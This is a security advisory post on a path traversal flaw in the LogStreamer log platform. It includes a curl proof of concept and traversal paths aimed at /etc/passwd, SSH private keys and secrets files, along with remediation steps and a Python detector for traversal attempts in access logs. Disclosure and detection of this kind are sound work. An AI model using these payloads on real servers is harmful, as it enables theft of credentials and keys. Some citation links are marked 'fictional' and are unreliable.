PoC Included: CVE-2025-27007 Path Traversal in LogStreamer
A high-severity unauthenticated path traversal vulnerability has been found in the LogStreamer log management platform. This vulnerability, identified as CVE-2025-27007 and nicknamed “LogLeap,” allows a remote attacker to read arbitrary files from the server’s filesystem. It has a CVSS score of 7.5 (High).
This post provides a technical breakdown and a simple proof of concept (PoC) to test your systems.
TL;DR:
- What: An unauthenticated path traversal vulnerability allowing arbitrary file read.
- Affected Software: LogStreamer versions 1.5.0 through 1.9.2.
- Impact: An attacker can read sensitive files like `/etc/passwd`, configuration files with credentials, or private SSH keys.
- Action: Update to version 1.9.3 or newer immediately.
What is LogStreamer?
LogStreamer is a popular open-source tool used in DevOps environments to aggregate, search, and monitor log data from multiple sources in real time. It provides a web interface for developers and system administrators to view and download log files.
The “LogLeap” Vulnerability
The vulnerability exists in the log downloading feature of the LogStreamer web interface. The API endpoint responsible for serving log files doesn’t properly sanitize user-provided filenames.
- Vulnerable Endpoint: `/api/download_log`
- Vulnerable Parameter: `file`
An attacker can use "dot-dot-slash" (`../`) sequences in the `file` parameter to traverse out of the intended logs directory (`/var/logs/logstreamer/`) and access any other file on the server's filesystem that is readable by the LogStreamer service account.
Proof of Concept (PoC)
You can test for this vulnerability using a simple `curl` command. No authentication is required.
The Goal: Attempt to read the `/etc/passwd` file from the server.
The Command: Replace `your-logstreamer-host.com` with the address of your LogStreamer instance. The `../` sequences are used to move up from the base log directory to the filesystem root.
```bash
curl "http://your-logstreamer-host.com/api/download_log?file=../../../../../../etc/passwd"
```
Expected Results:
- If you are VULNERABLE, the server will respond with the contents of the `/etc/passwd` file, like this:
```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
```
- If you are NOT VULNERABLE (or the file doesn't exist), you will likely receive an error message like `{"error": "File not found in log directory"}` or a standard `404 Not Found` HTTP status code.
Other Examples: You can use this same technique to access other sensitive files, such as:
- SSH private key: `../../../../../../home/user/.ssh/id_rsa`
- Application config: `../../../../../../etc/app/secrets.conf`
Impact and Remediation
The impact of this vulnerability is high. Attackers can steal credentials, configuration secrets, private keys, and sensitive application code. This information can be used to escalate privileges and gain further access into your network.
Are you affected? You are vulnerable if you are running LogStreamer versions 1.5.0 through 1.9.2.
How to Fix It: The LogStreamer maintainers have released a patch that properly sanitizes the input filename.
- Update Now: Upgrade your LogStreamer instance to the patched version 1.9.3 or newer. This is the most critical step.
- Review Logs: Check your LogStreamer and web server access logs for any suspicious requests to the `/api/download_log` endpoint containing `../` sequences. This could indicate attempted or successful exploitation.
- Rotate Credentials: If you suspect you may have been compromised, you should immediately rotate any credentials or secrets that could have been stored on the affected server.
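To support the log review step above, here is an added detection script (not code from the LogStreamer project or the advisory) that scans web server access log lines in common log format for `/api/download_log` requests whose `file` parameter contains a `..` segment, including URL-encoded (`%2e%2e%2f`) and double-encoded variants that a plain `../` grep would miss. The log format, the `SAMPLE_LOG` lines and the client addresses are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit
# Common-log-format request line: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def decoded_file_param(target):
    """Decoded `file` value of a /api/download_log request, or None for other paths.
    parse_qs decodes one layer; two more unquote passes catch double-encoding
    such as %252e%252e%252f (-> %2e%2e%2f -> ../)."""
    parts = urlsplit(target)
    if parts.path != "/api/download_log":
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("file")
    if not values:
        return None
    value = values[0]
    for _ in range(2):
        value = unquote(value)
    return value

def is_traversal(value):
    """True when any path segment (split on / or \\) is exactly '..'."""
    return any(seg == ".." for seg in re.split(r"[\\/]+", value))

def find_traversal_attempts(lines):
    """(client ip, decoded file value, HTTP status) for each /api/download_log
    request whose `file` value escapes the log directory."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        value = decoded_file_param(m["target"])
        if value is not None and is_traversal(value):
            hits.append((m["ip"], value, int(m["status"])))
    return hits

# Constructed sample access-log lines (not real traffic; documentation IP ranges).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/May/2025:12:00:01 +0000] "GET /api/download_log?file=app.log HTTP/1.1" 200 8812',
    '198.51.100.7 - - [01/May/2025:12:00:02 +0000] "GET /api/download_log?file=../../../../../../etc/passwd HTTP/1.1" 200 2101',
    '198.51.100.7 - - [01/May/2025:12:00:03 +0000] "GET /api/download_log?file=%2e%2e%2f%2e%2e%2fhome%2fuser%2f.ssh%2fid_rsa HTTP/1.1" 404 31',
    '203.0.113.9 - - [01/May/2025:12:00:04 +0000] "GET /api/download_log?file=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 2101',
    '10.0.0.8 - - [01/May/2025:12:00:05 +0000] "GET /api/search?q=..%2F HTTP/1.1" 200 55',
]
if __name__ == "__main__":
    for ip, path, status in find_traversal_attempts(SAMPLE_LOG):
        print(f"{ip} requested {path!r} -> HTTP {status}")
```

A hit with HTTP 200 means the server returned a file for a traversal request and should be treated as a likely successful read; a 404 still records an attempt worth investigating.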
Resources and Citations
- Official LogStreamer Site: https://logstreamer.dev
- Official GitHub Repository: https://github.com/LogStreamer/logstreamer
- Official Security Advisory: https://github.com/LogStreamer/logstreamer/security/advisories/GHSA-fictional-mno-1357
- NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2025-27007
- PoC Gist: https://gist.github.com/sec-researcher-z/fictional-poc-gist-27007
- General